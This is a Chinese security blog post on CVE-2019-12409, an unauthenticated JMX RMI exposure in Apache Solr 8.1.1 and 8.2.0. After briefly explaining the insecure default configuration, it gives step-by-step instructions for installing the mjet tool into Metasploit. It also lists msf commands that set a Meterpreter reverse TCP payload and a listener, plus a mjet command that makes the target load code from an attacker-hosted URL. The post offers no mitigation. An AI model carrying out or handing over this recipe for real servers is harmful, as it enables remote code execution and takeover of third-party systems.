微慑信息网

CVE-2019-12409-Solr-远程代码-2

影响版本

Apache Solr的8.1.1和8.2.0

Solr的文件目录。

文件目录

(1)bin:solr的运行脚本

(2)contrib:solr的一些扩展jar包,用于增强solr的功能

(3)dist:该目录包含build过程中产生的jar文件,以及相关的依赖文件

(4)data:用于存放与zookeeper关联的配置文件zoo.cfg

(5)example:solr工程的例子目录

Apache Solr的8.1.1和8.2.0发行版中的默认配置文件/bin/solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用受影响版本中的默认配置,那么将启用JMX监视服务并将对公网监听一个18983的RMI端口,且无需进行任何身份验证,配合JMX RMI将会导致远程代码执行.

ENABLE_REMOTE_JMX_OPTS为True

下面踩坑的地方很多。

首先要下载mjet,https://github.com/mogwaisec/mjet

按照说明中的步骤:

拷贝 “MBean”到 “data/java/metasploit”

拷贝 java_mlet_server.rb 到 “modules/exploits/multi/misc/”

osx上面的位置是/opt/metasploit-framework/embedded/framework/data

kali的位置是/usr/share/metasploit-framework/data

这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下

启动msf刷新模块

刷新模块

启动msf监听,选择刚才导入的那个模块

这里使用反向连接

msf > use exploit/multi/misc/java_mlet_server

msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp

msf exploit(multi/misc/java_mlet_server) > set LHOST 192.168.1.104

msf exploit(multi/misc/java_mlet_server) > set LPORT 8888

msf exploit(multi/misc/java_mlet_server) > set URIPATH /dkivetest

sessions

java -jar mjet.jar -p 18983 -u http://192.168.1.104:8080/test -t 192.168.1.104

 

本文标题:CVE-2019-12409-Solr-远程代码-2
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2019/1119_9471.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2019-12409-Solr-远程代码-2
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们